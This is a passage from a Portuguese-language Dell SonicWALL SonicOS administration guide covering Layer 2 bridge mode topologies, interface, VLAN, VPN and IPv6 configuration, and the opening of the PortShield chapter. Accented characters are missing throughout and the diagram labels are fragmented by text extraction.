a WAN primria deve ter um caminho para a Internet. Caso a WAN primria seja empregada
ou no como parte de um par de ponte, tal no afetar sua capacidade de fornecer essas
comunicaes de pilha.
Nota Se a conectividade com a Internet no estiver disponvel, o licenciamento poder ser

executado manualmente e as atualizaes de assinatura tambm podem ser executadas
manualmente (http://www.sonicwall.com/us/support/2134_4170.html).
Exemplos de topologias
A seguir encontram-se exemplos de topologias que descrevam implantaes comuns. O Modo
de ponte de camada 2 embutido representa a adio de um dispositivo de segurana Dell
SonicWALL para fornecer servios de segurana em uma rede em que se encontra um firewall
no lugar. A Segurana de permetro representa a adio de um dispositivo de segurana Dell
SonicWALL no Modo de ponte L2 puro a uma rede existente, onde o firewall est colocado
perto do permetro da rede. A Segurana interna representa a integrao completa de um
dispositivo de segurana Dell SonicWALL em modo misto, em que fornece ponte L2, servios
de WLAN e acesso de WAN com NAT em simultneo. O Modo de ponte de camada 2 com
alta disponibilidade representa o cenrio de modo misto onde o par de HA do firewall fornece
alta disponibilidade juntamente com ponte L2. O Modo de ponte de camada 2 com VPN SSL
representa o cenrio em que um dispositivo da srie SonicWALL Aventail SSL VPN ou
SonicWALL SSL VPN implantado junto com o Modo de ponte L2.
Ponte de camada 2 sem fio na pgina 235
Modo de ponte de camada 2 embutido na pgina 235

Segurana de permetro na pgina 236
Segurana interna na pgina 236
Modo de ponte de camada 2 com alta disponibilidade na pgina 237
Modo de ponte de camada 2 com SSL VPN na pgina 238
Ponte de camada 2 sem fio
No modo sem fio, depois de aplicar ponte na interface sem fio (WLAN) a uma zona de LAN ou
DMZ, a zona de WLAN torna-se a interface com ponte secundria, permitindo que os clientes
sem fio compartilhem a mesma sub-rede e o pool de DHCP como seus equivalentes com fio.
Para configurar uma ponte de interface de camada 2 de WLAN para LAN:
Etapa 1 Navegue at a pgina Rede > Interfaces na interface de gerenciamento do SonicOS.

Etapa 2 Clique no cone Configurar da interface sem fio qual deseja aplicar ponte. A caixa de dilogo
Editar interface exibida.
Etapa 3 Selecione o Modo de ponte de camada 2 como a Atribuio de IP.
Nota Embora seja criada automaticamente uma regra geral para permitir o trfego entre a zona
de WLAN e sua interface de ponte selecionada, ainda se aplicam as propriedades de
segurana do tipo de zona de WLAN. Qualquer regra especfica deve ser adicionada
manualmente.
Etapa 4 Selecione a interface qual a WLAN deve ter Ponte para. Neste exemplo, X0 (zona de LAN
padro) escolhida.
Etapa 5 Configure as opes restantes normalmente. Para obter mais informaes sobre a
configurao de interfaces de WLAN, consulte Configurar interfaces sem fio na pgina 200.
Modo de ponte de camada 2 embutido
Esse mtodo til em redes onde h um firewall existente que permanecer no local, mas voc
deseja usar os servios de segurana do firewall sem efetuar grandes alteraes na rede.
Colocando o firewall no Modo de ponte de camada 2, as interfaces X0 e X1 se tornaro parte
do mesmo domnio/rede de difuso (da interface de WAN X1).
Este exemplo refere-se a um dispositivo de segurana Dell SonicWALL instalado em um
ambiente de comutao Hewlett Packard ProCurve. A SonicWALL um membro da ProCurve
Alliance da HP. Podem ser encontrados mais detalhes no site que se segue:
http://www.procurve.com/alliance/members/sonicwall.htm.
Os pacotes de software de servidor ProCurve Manager Plus (PCM+) e Network Immunity
Manager (NIM) da HP podem ser usados para gerenciar os switches, bem como alguns
aspectos do dispositivo de segurana Dell SonicWALL.
Para configurar o firewall para esse cenrio, navegue at a pgina Rede > Interfaces e clique
no cone de configurao da interface LAN X0. Na pgina Configuraes de X0, defina a
Atribuio de IP para "Modo de ponte de camada 2" e defina a interface Com ponte para:
como "X1". Certifique-se tambm de que a interface esteja configurada para HTTP e SNMP
para que possa ser gerenciada a partir da DMZ por PCM+/NIM. Clique em OK para salvar e
ativar a alterao.
Voc tambm precisar certificar-se de modificar as regras de acesso do firewall para permitir
trfego de LAN para WAN e de WAN para LAN, caso contrrio, o trfego no passar com
xito. Tambm poder precisar modificar informaes de roteamento em seu firewall se seu
servidor PCM+/NIM se encontrar na DMZ.

Segurana de permetro
A segurana de permetro um cenrio de rede em que o firewall adicionado ao permetro

para fornecer servios de segurana (a rede poder ou no ter um firewall existente entre o
firewall e o roteador). Nesse cenrio, tudo o que se encontra abaixo do firewall (o segmento
Interface de ponte primria) geralmente ser considerado como tendo um nvel inferior de
confiana em relao a tudo o que se encontra esquerda do firewall (o segmento Interface
de ponte secundria). Por esse motivo, seria apropriado usar X1 (WAN primria) como a
Interface de ponte primria.
O envio de trfego de hosts conectados Interface de ponte secundria (LAN) seria permitido
atravs do firewall para seus gateways (interfaces de VLAN no switch L3 e, em seguida, por
meio do roteador), enquanto o recebimento do trfego da Interface de ponte primria (WAN)
no seria, por padro, permitido.
Se houvesse servidores pblicos, por exemplo, um servidor de e-mail e Web, no segmento
Interface de ponte secundria (LAN), poderia ser adicionada uma regra de acesso permitindo
o trfego de LAN->WAN para os servios e endereos IP apropriados para permitir trfego de
entrada para esses servidores.
Segurana interna
Um cenrio de rede em que o firewall atuar como o dispositivo de segurana de permetro e

a plataforma sem fio segura. Simultaneamente, ele fornecer segurana de ponte L2 entre os
segmentos da estao de trabalho e do servidor da rede sem precisar enderear novamente
qualquer servidor ou estao de trabalho.
Essa implantao tpica de topologia de modo misto interdepartamental demonstra como o
firewall consegue simultaneamente fazer ponte e rota/NAT. O trfego para/do segmento
Interface de ponte primria (servidor) de/para o segmento Interface de ponte secundria
(estao de trabalho) passar atravs da ponte L2.
Como ambas as interfaces do par de ponte so atribudas a uma zona Confivel (LAN), ser
aplicado o seguinte:
Todo o trfego ser permitido por padro, mas as regras de acesso podem ser construdas
conforme necessrio.
Considere, para o ponto de contraste, o que poderia ocorrer se a X2 (interface de ponte
primria) fosse, em vez disso, atribuda a uma zona Pblica (DMZ): Todas as estaes de
trabalho seriam capazes de acessar os servidores, mas os servidores no seriam capazes
de estabelecer comunicaes com as estaes de trabalho. Enquanto isso provavelmente
suportaria os requisitos de fluxo de trfego (por exemplo, estaes de trabalho iniciando
sesses em servidores), teria no entanto dois efeitos indesejveis:
O servidor DHCP estaria na DMZ. As solicitaes de DHCP das estaes de trabalho
passariam pela ponte L2 para o servidor DHCP (192.168.0.100), mas as ofertas de DHCP
do servidor seriam descartadas pela regra de acesso padro de negao de DMZ->LAN.
Uma regra de acesso teria de ser adicionada ou o padro modificado para permitir esse
trfego da DMZ para a LAN.
A direcionalidade dos servios de segurana seria classificada como Enviada para trfego
de estaes de trabalho para o servidor, pois o trfego teria uma zona de origem Confivel
e uma zona de destino Pblica. Isso pode no ser totalmente ideal, pois proporcionaria
menos controle do que as classificaes Recebida ou (idealmente) Confivel.
A direcionalidade de servios de segurana seria classificada como Confivel e todas as
assinaturas (Recebida, Enviada e Bidirecional) seriam aplicadas, oferecendo o mais alto
nvel de segurana para/de ambos os segmentos.
Para obter instrues detalhadas sobre como configurar interfaces no Modo de ponte de
camada 2, consulte Configurar modo de ponte de camada 2 na pgina 240.

Modo de ponte de camada 2 com alta disponibilidade
Este mtodo apropriado em redes em que a alta disponibilidade e o modo de ponte de

camada 2 so desejados. Este exemplo destina-se a dispositivos de segurana Dell
SonicWALL e assume o uso de switches com VLANs configuradas.
Server
VLAN 100 172.27.100./21

VLAN 200 172.27.200./21
IP Routing Enabled
VLAN 100 tagged on ports
d Core C2-1 and D2-1
ge
ag VLAN 200 used to test routing
0T Switch - HP 100z status during failover
10
AN
VL
NSA 3500 HA Pair

Layer 2 Bridge Mode C24 D24
X0 bridged to X2
X1 left as WAN with X5 HA Link
management
IP address to access UI
Third-party Firewall Third-party Firewall
Port 23 Port 24
VLAN 100 - tagged on ports

Edge 23 and 24
Switch - HP 3500yl
VLAN 100 172.27.100.20/24
HP ProCurve
Switch
O par de HA do firewall consiste em dois firewalls, conectados em conjunto na porta X5, a porta
de HA designada. A porta X1 em cada dispositivo est configurada para conectividade de WAN
normal e usada para acessar a interface de gerenciamento desse dispositivo. O modo de
ponte de camada 2 implementado com a porta X0 com ponte para a porta X2.
Ao configurar esse cenrio, h vrios aspectos a levar em considerao relativamente aos
firewalls e aos switches.
Nos firewalls:
No habilite a opo MAC virtual durante a configurao de Alta disponibilidade. Em uma
configurao de Modo de ponte de camada 2, essa funo no til.
No recomendvel habilitar o Modo de preempo em um ambiente embutido como
esse. Se o Modo de preempo for necessrio, siga as recomendaes na documentao
de seus switches, pois os valores de acionamento e perodo de failover desempenham um
papel fundamental aqui.

Considere reservar uma interface para a rede de gerenciamento (este exemplo usa a X1).
Se for necessrio atribuir endereos IP s interfaces de ponte para fins de teste ou por
outros motivos, a SonicWALL recomenda usar a rede VLAN de gerenciamento atribuda
aos switches para fins administrativos e de segurana. Observe que os endereos IP
atribudos para fins de HA no interagem diretamente com o fluxo de trfego real.
Nos switches:
Usar vrias portas de marca: Conforme mostrado no diagrama acima, foram criadas duas
portas de marca (802.1q) para VLAN 100 no switch de limite (portas 23 e 24) e no switch
central (C24 D24). Os dispositivos so conectados de forma embutida entre esses dois
switches. Em um ambiente de alto desempenho, geralmente recomendvel ter
Agregao de links/Truncamento de portas, LACP dinmico ou at um link completamente
separado designado para tal implantao (usando OSPF) e a tolerncia a falhas de cada
um dos switches deve ser considerada. Consulte a documentao do seu switch para obter
mais informaes.
Em switches ProCurve da HP, quando duas portas so marcadas na mesma VLAN, o grupo
de portas ser automaticamente colocado em uma configurao de failover. Nesse caso,
assim que uma porta falhar, a outra ficar ativa.
Modo de ponte de camada 2 com SSL VPN
Essa topologia de amostra abrange a adequada instalao de um dispositivo de segurana de

rede SonicWALL em seu ambiente de rede SonicWALL EX-Series SSL VPN ou SonicWALL
SSL VPN existente. Colocando o dispositivo no Modo de ponte de camada 2, com uma
conexo interna e privada para o dispositivo SSL VPN, voc pode verificar se existem vrus,
spyware e intruses em ambas as direes. Nesse cenrio, o firewall no usado para
imposio de segurana, mas em vez disso para verificao bidirecional, bloqueando vrus e
spyware e interrompendo tentativas de intruso. Quando programado corretamente, o
dispositivo de segurana de rede no interromper o trfego de rede, a menos que o
comportamento ou o contedo do trfego seja determinado para ser indesejvel. As duas
implantaes de uma e duas portas do dispositivo de segurana Dell SonicWALL so
abordadas nesta seo.
Regras de acesso de WAN para LAN
Uma vez que o dispositivo de segurana de rede ser usado nesse cenrio de implantao
somente como um ponto de imposio de antivrus, anti-spyware e preveno de intruso, a
poltica de segurana existente deve ser modificada para permitir que o trfego passe em
ambas as direes entre a WAN e a LAN.
Na pgina Firewall > Regras de acesso, clique no cone Configurar para a interseo do
trfego de WAN para LAN. Clique no cone Configurar ao lado da regra padro que bloqueia
implicitamente trfego no iniciado da WAN para a LAN. Na janela Editar regra, selecione
Permitir para a configurao Ao e, em seguida, clique em OK.
Configurar as interfaces de rede e ativar o modo de L2B
Neste cenrio, a interface de WAN usada para o seguinte:

Acesso interface de gerenciamento para o administrador
Atualizaes de servio de assinatura no MySonicWALL
A rota padro do dispositivo e, subsequentemente, o "prximo salto" do trfego interno do
dispositivo SSL VPN (isto porque a interface de WAN deve estar no mesmo segmento de
IP da interface interna do dispositivo SSL VPN)

A interface de LAN no dispositivo de segurana de rede usada para monitorar o trfego de
cliente no criptografado proveniente da interface externa do dispositivo SSL VPN. Este o
motivo para execuo no Modo de ponte de camada 2 (em vez de reconfigurar a interface
externa do dispositivo SSL VPN para ver a interface de LAN como a rota padro).
Na pgina Rede > Interfaces da interface de gerenciamento do SonicOS, clique no cone
Configurar da interface de WAN e, em seguida, atribua um endereo que possa acessar a Internet
para que o dispositivo consiga obter atualizaes de assinatura e se comunicar com NTP.
As configuraes de endereo DNS de gateway e interno/externo correspondero s de seu
dispositivo SSL VPN:
Endereo IP: Isso deve corresponder ao endereo da interface interna no dispositivo SSL
VPN.
Mscara de sub-rede, Gateway padro e Servidor(es) DNS: Faa a correspondncia
desses endereos s configuraes do dispositivo SSL VPN.
Para a configurao Gerenciamento, marque as caixas de seleo HTTPS e Ping. Clique em
OK para salvar e ativar as alteraes.
Para configurar as definies de interface LAN, navegue at a pgina Rede > Interfaces e
clique no cone Configurar da interface de LAN.
Para a configurao Atribuio de IP, selecione Modo de ponte de camada 2. Para a
configurao Ponte para, selecione X1.
Se voc tambm precisar passar trfego marcado de VLAN, suportado em firewalls, clique na
guia Filtragem VLAN e adicione todas as VLANs que precisaro ser passadas.
Clique em OK para salvar e ativar a alterao. Voc poder ser desconectado
automaticamente da interface de gerenciamento do dispositivo de segurana de rede. Agora
voc pode desconectar seu laptop ou desktop de gerenciamento a partir da interface X0 do
dispositivo e desligar o dispositivo antes de conect-lo fisicamente sua rede.
Instalar o dispositivo de segurana Dell SonicWALL entre a rede e o dispositivo SSL VPN
Independentemente de seu mtodo de implantao (hospedagem nica ou dupla), o firewall

dever ser colocado entre a interface X0/LAN do dispositivo SSL VPN e a conexo com sua
rede interna. Isso permite que o dispositivo se conecte aos servidores de atualizao de
assinatura e licenciamento da SonicWALL e verifique o trfego descriptografado de clientes
externos solicitando acesso a recursos de rede interna.
Se seu dispositivo SSL VPN estiver no modo de duas portas atrs de um firewall de terceiros,
ele tem hospedagem dupla. Para conectar um dispositivo SSL VPN de hospedagem dupla,
siga estas etapas:
1. Conecte a porta X0/LAN no dispositivo de segurana de rede porta X0/LAN no dispositivo
SSL VPN.
2. Conecte a porta X1/WAN no dispositivo de segurana de rede porta onde o SSL VPN foi
conectado anteriormente.
3. Ligue o dispositivo.
Se seu dispositivo SSL VPN estiver no modo de uma porta na DMZ de um firewall de terceiros,
ele tem hospedagem nica. Para conectar um dispositivo SSL VPN de hospedagem nica, siga
estas etapas:
1. Conecte a porta X0/LAN no dispositivo de segurana de rede porta X0/LAN do dispositivo
SSL VPN.
2. Conecte a porta X1/WAN no dispositivo de segurana de rede porta onde o SSL VPN foi
conectado anteriormente.
3. Ligue o dispositivo.

Definir ou verificar configuraes
Em uma estao de gerenciamento na sua rede interna, voc dever agora ser capaz de
acessar a interface de gerenciamento do dispositivo de segurana de rede usando seu
endereo IP de WAN.
Certifique-se de que todos os servios de segurana do dispositivo de segurana Dell
SonicWALL esto habilitados. Consulte Licenciar servios na pgina 241 e Ativar servios de
segurana em cada zona na pgina 241.
O servio de filtragem de contedo SonicWALL deve ser desabilitado antes de o dispositivo
ser implantado junto com um dispositivo SonicWALL Aventail SSL VPN. Na pgina Rede >
Zonas, clique em Configurar ao lado de zona de LAN (X0), desmarque a caixa de seleo
Impor servio de filtragem de contedo e, em seguida, clique em OK.
Se voc ainda no alterou a senha administrativa no dispositivo de segurana Dell SonicWALL,
voc pode faz-lo na pgina Sistema > Administrao.
Para testar o acesso sua rede a partir de um cliente externo, conecte-se ao dispositivo SSL
VPN e efetue login. Uma vez conectado, tente acessar os recursos da rede interna. Em caso
de problemas, analise sua configurao e consulte Definir as configuraes comuns de
implantaes de modo de ponte L2 na pgina 241.
Configurar modo de ponte de camada 2

Lista de tarefas de configurao para o modo de ponte de camada 2 na pgina 240
Configurar o procedimento do modo de ponte de camada 2 na pgina 244
Integrao de VLAN com o modo de ponte de camada 2 na pgina 247
Integrao de VPN com o modo de ponte de camada 2 na pgina 248
Lista de tarefas de configurao para o modo de ponte de camada 2

Escolha uma topologia que se adapte sua rede
Definir as configuraes comuns de implantaes de modo de ponte L2 na pgina 241
Licencie servios de segurana
Desabilite o servidor DHCP
Configure e habilite o gerenciamento de SNMP e HTTP/HTTPS
Habilite syslog
Ative os servios de segurana em zonas afetadas
Crie regras de acesso do firewall
Defina configuraes de log
Defina configuraes da zona sem fio
Configurar a interface de ponte primria na pgina 244
Selecione a zona para a interface de ponte primria
Ative o gerenciamento
Ative os servios de segurana
Configurar a interface de ponte secundria na pgina 245
Selecione a zona para a interface de ponte secundria

Ative o gerenciamento
Ative os servios de segurana
Aplique servios de segurana s zonas apropriadas
Definir as configuraes comuns de implantaes de modo de ponte L2

As configuraes a seguir precisam ser definidas em seu dispositivo de segurana Dell
SonicWALL antes de us-lo na maioria das topologias de Modo de ponte de camada 2.
Licenciar servios
Quando o dispositivo for registrado com xito, v para a pgina Sistema > Licenas e clique
em Sincronizar em Gerenciar servios de segurana online. Isso contatar o servidor de
licenciamento do firewall e certifique-se de que o dispositivo esteja licenciado corretamente.
Para verificar o status de licenciamento, v para a pgina Sistema > Status e visualize o status
da licena de todos os servios UTM (Antivrus do gateway, Anti-spyware e Preveno de
intruso).
Desabilitar o servidor DHCP
Ao usar um dispositivo de segurana Dell SonicWALL no Modo de ponte de camada 2 em uma

configurao de rede em que outro dispositivo est atuando como o servidor DHCP, voc deve
desabilitar primeiro seu mecanismo de DHCP interno que est configurado e em execuo por
padro. Na pgina Rede > Servidor DHCP, desmarque a caixa de seleo Habilitar servidor
DHCP e, em seguida, clique no boto Aceitar na parte superior da tela.
Definir configuraes de SNMP
Na pgina Sistema > Administrao, verifique se a caixa de seleo junto a Habilitar SNMP
est marcada e, em seguida, clique no boto Aceitar na parte superior da tela.
Em seguida, clique no boto Configurar. Na pgina Configuraes de SNMP, digite todas as
informaes relevantes para seu dispositivo: os nomes de comunidade de SNMP OBTER e
CAPTURAR que o servidor SNMP espera e o endereo IP do servidor SNMP. Clique em OK
para salvar e ativar as alteraes.
Habilitar SNMP e HTTPS nas Interfaces
Na pgina Rede > Interfaces, habilite SNMP e HTTP/HTTPS na interface por meio da qual
voc gerenciar o dispositivo.
Habilitar syslog
Na pgina Log > Syslog, clique no boto Adicionar e crie uma entrada para o servidor syslog.
Clique em OK para salvar e ativar a alterao.
Ativar servios de segurana em cada zona
Na pgina Rede > Zonas, para cada zona que voc usar, certifique-se de que os servios de
segurana estejam ativados.
Em seguida, na pgina Servios de segurana de cada servio, ative e defina as
configuraes que so mais adequadas para o seu ambiente.

Um exemplo de configuraes de Antivrus do gateway mostrado abaixo:
Um exemplo de configuraes de Preveno de intruso mostrado abaixo:

Um exemplo de configuraes de Anti-spyware mostrado abaixo:
Criar regras de acesso do firewall
Se voc planeja gerenciar o dispositivo a partir de uma zona diferente ou se voc planejar usar
um servidor como o PCM+/NIM da HP para servios de gerenciamento, SNMP ou syslog, crie
regras de acesso para trfego entre as zonas. Na pgina Firewall > Regras de acesso, clique
no cone da interseo da zona do servidor e da zona que tem usurios e servidores (seu
ambiente pode ter mais de uma dessas intersees). Crie uma nova regra para permitir que o
servidor comunique com todos os dispositivos nessa zona.

Definir configuraes de log
Na pgina Log > Categorias, defina o Nvel de log para Informacional e o Nvel de alerta
para Crtico. Clique em Aceitar para salvar e ativar a alterao.
Em seguida, v para a pgina Log > Resoluo de nome e defina o Mtodo de resoluo
de nome para DNS, em seguida, NetBios. Clique em Aceitar para salvar e ativar a alterao.
Definir configuraes da zona sem fio
Se voc estiver usando um sistema PCM+/NIM da HP e ele se destinar a gerenciar um

switch ProCurve da HP em uma interface atribuda a uma zona de WLAN/sem fio, voc
precisar desativar dois recursos, caso contrrio, no ser possvel gerenciar o switch.
V para a pgina Rede > Zonas e selecione sua zona sem fio. Na guia Sem fio, desmarque
as caixas de seleo junto de Apenas permitir trfego gerado por um SonicPoint e
Imposio de WiFiSec. Clique em OK para salvar e ativar a alterao.
Configurar o procedimento do modo de ponte de camada 2

Consulte Seleo de zona de interface de ponte L2 na pgina 232 para escolher uma topologia
que melhor se adapte sua rede. Neste exemplo, vamos usar uma topologia que se parece
mais com a topologia de ponte L2 simples.
Escolha uma interface para atuar como a interface de ponte primria. Consulte Seleo de
zona de interface de ponte L2 na pgina 232 para obter informaes sobre essa seleo.
Neste exemplo, usaremos X1 (atribuda automaticamente WAN primria):

Etapa 2 Clique no cone Configurar na coluna direita da interface X1 (WAN).
Etapa 3 Configure a interface com um endereo IP esttico (por exemplo, 192.168.0.12).

Nota A interface de ponte primria deve ter uma atribuio de IP esttico.
Etapa 4 Configure o gateway padro. Isso necessrio para o prprio dispositivo de segurana
acessar a Internet. (Isto se aplica somente a interfaces de WAN.)
Etapa 5 Configure o servidor DNS. (Isto se aplica somente a interfaces de WAN.)
Escolha uma interface para atuar como a interface de ponte secundria. Consulte Seleo de
zona de interface de ponte L2 para obter informaes sobre essa seleo. Neste exemplo,
usaremos X0 (automaticamente atribuda LAN):
Etapa 1 Na pgina Rede > Interfaces, clique no cone Configurar na coluna direita da interface
X0 (LAN).
Etapa 2 Na lista suspensa Atribuio de IP, selecione Modo de ponte de camada 2.
Etapa 3 Na lista suspensa Ponte para, selecione a interface X1.
Etapa 5 Opcionalmente, voc pode habilitar a configurao Bloquear todo o trfego no IPv4 para
impedir que a ponte L2 passe trfego no IPv4.
Filtragem VLAN
Voc tambm pode navegar para a guia Filtragem VLAN para controlar o trfego de VLAN
por meio da ponte L2. Por padro, todas as VLANs so permitidas:
Selecione Bloquear VLANs listadas (lista negra) na lista suspensa e adicione as
VLANs que desejar bloquear do painel esquerdo para o painel direito. Todas as VLANs
adicionadas ao painel direito sero bloqueadas e todas as VLANs restantes no painel
esquerda sero permitidas.
Selecione Permitir VLANs listadas (lista branca) na lista suspensa e adicione as VLANs
que desejar permitir explicitamente do painel esquerdo para o painel direito. Todas as
VLANs adicionadas ao painel direito sero permitidas e todas as VLANs restantes no
painel esquerda sero bloqueadas.
A pgina Rede > Interfaces exibe a configurao atualizada:
Agora voc pode aplicar os servios de segurana nas zonas apropriadas, conforme
desejado. Neste exemplo, eles devem ser aplicados na LAN, WAN ou em ambas as zonas.

Configurando um Desvio L2 para falhas de hardware
Um desvio L2 permite realizar um desvio fsico do firewall quando uma interface

compartilhada com outra interface com a funcionalidade de desvio da LAN. Isso permite que o
trfego da rede continue fluindo se ocorrer um erro de firewall irrecupervel.
Quando o rel do desvio L2 estiver fechado, os cabos de rede conectados s interfaces
ignoradas (X0 e X1) so fisicamente conectados, como se fossem um nico cabo de rede
contnuo. A opo Acionar desvio fsico em funcionamento incorreto fornece ao usurio a
opo de evitar a interrupo do trfego de rede, ignorando o firewall no caso de um
funcionamento incorreto.
O desvio L2 s aplicvel s interfaces no Modo de Ponte de Camada 2. A opo Acionar
desvio fsico em funcionamento incorreto somente exibida quando a opoModo de
Ponte de Camada 2 estiver selecionada no menu Atribuio de IP/modo. Esta opo no
ser exibida a menos que exista um rel de desvio fsico entre as duas interfaces do par de
ponte.
Quando a opo Acionar desvio fsico em funcionamento incorreto estiver habilitada, as
outras opes de Modo de Ponte de Camada 2 sero automaticamente definidas para as
seguintes:
Bloquear todo o trfego no proveniente do IPv4 desabilitada. Quando habilitada,
esta opo bloqueia todos os quadros Ethernet no pertencentes ao IPv4. Assim, esta
opo est desabilitada.
Nunca rotear trfego nesse par-ponte habilitada. Quando habilitada, esta opo
previne que os pacotes sejam encaminhados para uma rede diferente da rede de par do
par de ponte. Assim, esta opo est habilitada.
Detectar somente trfego nesse par-ponte desabilitada. Quando habilitada, o trfego
recebido na interface do par de ponte nunca encaminhado. Assim, esta opo est
desabilitada.
Desabilitar inspeo estvel nesse par de ponte inalterado. Esta opo no afetada.
Para configurar um desvio L2:
Etapa 1 Acesse a pgina Rede > Interfaces.
Etapa 2 Clique no cone Editar na coluna Configurar da interface que voc deseja configurar. A
janela Editar interface exibida.

Etapa 3 Selecione a caixa de seleo Acionar desvio fsico em funcionamento incorreto
Nota A caixa de seleo Acionar desvio fsico em funcionamento incorreto est disponvel
somente quando as interfaces X0 e X1 so compartilhadas em conjunto em um NSA- 6600
ou superior.
Etapa 4 Clique em OK para configurar a interface.
Integrao de VLAN com o modo de ponte de camada 2

As VLANs so suportadas em dispositivos de segurana Dell SonicWALL. Quando um pacote
com uma marca VLAN chega em uma interface fsica, o ID da VLAN avaliado para determinar
se ele suportado. A marca VLAN removida e o processamento de pacotes continua como
aconteceria com qualquer outro trfego. Uma exibio simplificada do caminho do pacote de
entrada e sada inclui as seguintes etapas potencialmente reiterativas:
Validao e reagrupamento de IP
Desencapsulamento (802.1q, PPP)
Descriptografia
Gerenciamento e pesquisa de cache de conexo
Pesquisa de poltica de rota
Pesquisa de poltica de NAT
Pesquisa de regra (poltica) de acesso
Gerenciamento de largura de banda
Converso de NAT
Manipulao de pacotes avanada (conforme aplicvel)
Validao de TCP
Manipulao de trfego de gerenciamento
Filtragem de contedo
Transformaes e anlise de fluxo (em dispositivos de segurana Dell SonicWALL):
H.323, SIP, RTSP, ILS/LDAP, FTP, Oracle, NetBIOS, Real Audio, TFTP
IPS e GAV
Neste ponto, se o pacote tiver sido validado como trfego aceitvel, ele encaminhado para
seu destino. O caminho de egresso do pacote inclui:
Criptografia
Encapsulamento
Fragmentao de IP
No egresso, se a pesquisa de poltica de rota determinar que a interface de gateway uma
subinterface de VLAN, o pacote marcado (encapsulado) com o cabealho de ID de VLAN
apropriado. A criao de subinterfaces de VLAN atualiza automaticamente a tabela de poltica
de roteamento do firewall:
A criao automtica de polticas de NAT, as regras de acesso em relao a subinterfaces de
VLAN se comportam exatamente da mesma forma como com interfaces fsicas. A
personalizao das regras e polticas que regem o trfego entre VLANs pode ser executada
com a eficincia e facilidade habituais do SonicOS.
Ao criar uma zona (como parte da administrao geral ou como uma etapa na criao de uma
subinterface), ser apresentada uma caixa de seleo na pgina de criao de zona para
controlar a criao automtica de um VPN de grupo para essa zona. Por padro, somente

zonas de tipo sem fio recm-criadas tero a opo "Criar VPN de grupo para esta zona"
habilitada, embora a opo possa ser habilitada para outros tipos de zona marcando a caixa
de seleo durante a criao.
O gerenciamento de servios de segurana entre subinterfaces de VLAN realizado ao nvel
de zona. Todos os servios de segurana so configurveis e aplicveis a zonas que incluem
interfaces fsicas, subinterfaces de VLAN ou combinaes de subinterfaces fsicas e de VLAN.
Os servios de antivrus do gateway e de preveno de intruso entre os diferentes grupos de
trabalho podem facilmente ser empregados com o uso de segmentao de VLAN, evitando a
necessidade de interfaces fsicas dedicados para cada segmento protegido.
O suporte a VLAN permite que as organizaes ofeream segurana interna significativa (em
oposio filtragem de pacotes simples) entre vrios grupos de trabalho e entre grupos de
trabalho e farms de servidores, sem precisar usar interfaces fsicas dedicadas no firewall.
Aqui, a capacidade para atribuir subinterfaces de VLAN zona de WAN e usar o modo de
cliente de WAN (apenas o endereamento esttico suportado em subinterfaces de VLAN
atribudas zona de WAN) ilustrada, alm da capacidade de suporte de failover e
balanceamento de carga de WAN. A distribuio de SonicPoints tambm demonstrada por
toda a rede por meio da sua conexo s portas de VLAN de modo de acesso em switches de
grupo de trabalho. Essas opes so ento devolvidas ao switch central, o qual conecta todas
as VLANs ao dispositivo por meio de um link de tronco.
Integrao de VPN com o modo de ponte de camada 2

Ao configurar uma VPN em uma interface que tambm esteja configurada para o modo de
ponte de camada 2, voc deve configurar uma rota adicional para garantir que o trfego de
VPN de recebido percorre corretamente o firewall. Navegue at a pgina Rede > Roteamento,
role at o final da pgina e clique no boto Adicionar. Na janela Adicionar poltica de rota,
configure a rota da seguinte forma:
Origem: QUALQUER
Destino: objeto-endereo-VPN-personalizado (Esse o objeto de endereo do intervalo de
endereos IP de tnel de VPN local.)
Servio: QUALQUER
Gateway: 0.0.0.0
Interface: X0

Configurando interfaces para o IPv6
As interfaces do IPv6 so configuradas na pgina Rede > Interfaces, clicando na opo IPv6
do boto de opo Exibir verso do IP localizado na parte superior esquerda da pgina.
Por padro, todas as interfaces do IPv6 so exibidas como encaminhadas sem nenhum
endereo IP. Vrios endereos IPv6 podem ser adicionados na mesma interface. A atribuio
de IP automtica s pode ser configurada em interfaces da WAN.
Cada interface poder ser configurada para receber ou no o anncio do roteador. O IPv6 pode
ser habilitado ou desabilitado em cada uma das interfaces.
A atribuio de zona para uma interface deve ser configurada por meio da pgina de interface
do IPv4 antes de alternar para o modo do IPv6.

Captulo 13
Configurando Interfaces do PortShield
Rede > Grupos do PortShield

A arquitetura do PortShield permite que voc configure algumas ou todas as portas da LAN em
contextos de segurana separados, possibilitando a proteo no apenas da WAN e DMZ, mas
tambm entre os dispositivos em sua rede. De forma efetiva, cada contexto tem o seu prprio
PortShield com velocidade de fios, que aproveita a proteo de um firewall dedicado de
inspeo profunda de pacotes.
Dica As zonas podem ser sempre aplicadas a mltiplas interfaces na pgina Rede > Interfaces,
mesmo sem o uso de agrupamentos do PortShield. No entanto, essas interfaces no
compartilharo a mesma sub-rede, a menos que elas sejam agrupadas com o uso do
PortShield.
possvel atribuir qualquer combinao de portas em uma interface do PortShield. Todas as

portas que voc no atribuir a uma interface do PortShield so atribudas interface da LAN.
Configurando Interfaces do PortShield | 251

A pgina Rede > Grupos do PortShield permite gerenciar as atribuies de portas s
interfaces do PortShield.
Modo esttico e Modo transparente

Uma interface do PortShield uma interface virtual com um conjunto de portas atribudas a
ela. Existem dois mtodos de atribuio de IP que podem ser implantados para criar interfaces
do PortShield. Eles so denominados modo esttico e modo transparente. As duas sees a
seguir descrevem esses modos.
Trabalhando no Modo esttico

Ao criar uma interface do PortShield no Modo esttico, voc cria manualmente um endereo
explcito que ser aplicado interface do PortShield. Todas as portas mapeadas para a
interface so identificadas por esse endereo. O Modo esttico est disponvel em interfaces
atribudas a zonas Confiveis, Pblicas ou Sem fio.
Nota Ao criar uma interface do PortShield no Modo esttico, verifique se o endereo IP atribudo
interface no est sendo usado por outra interface do PortShield.

Trabalhando no Modo transparente
O endereamento do Modo transparente permite que a sub-rede da WAN seja compartilhada
pela interface atual usando as atribuies do Objeto de endereo. O endereo IP da interface
o mesmo que o endereo IP da interface da WAN. O Modo transparente est disponvel em
interfaces atribudas a zonas Confiveis e Pblicas.
Nota Verifique se o endereo IP atribudo interface do PortShield est em uma sub-rede da

WAN.
Ao criar uma interface do PortShield no Modo transparente, voc cria um intervalo de

endereos que sero aplicados interface do PortShield. Voc inclui esses endereos em uma
entidade denominada Objeto de endereo. Os Objetos de endereos permitem que entidades
sejam definidas uma vez e novamente sejam usadas em vrias instncias referenciais por toda
a interface do SonicOS. Ao criar uma interface do PortShield usando um objeto de endereo,
todas as portas mapeadas para a interface so identificadas por qualquer um dos endereos
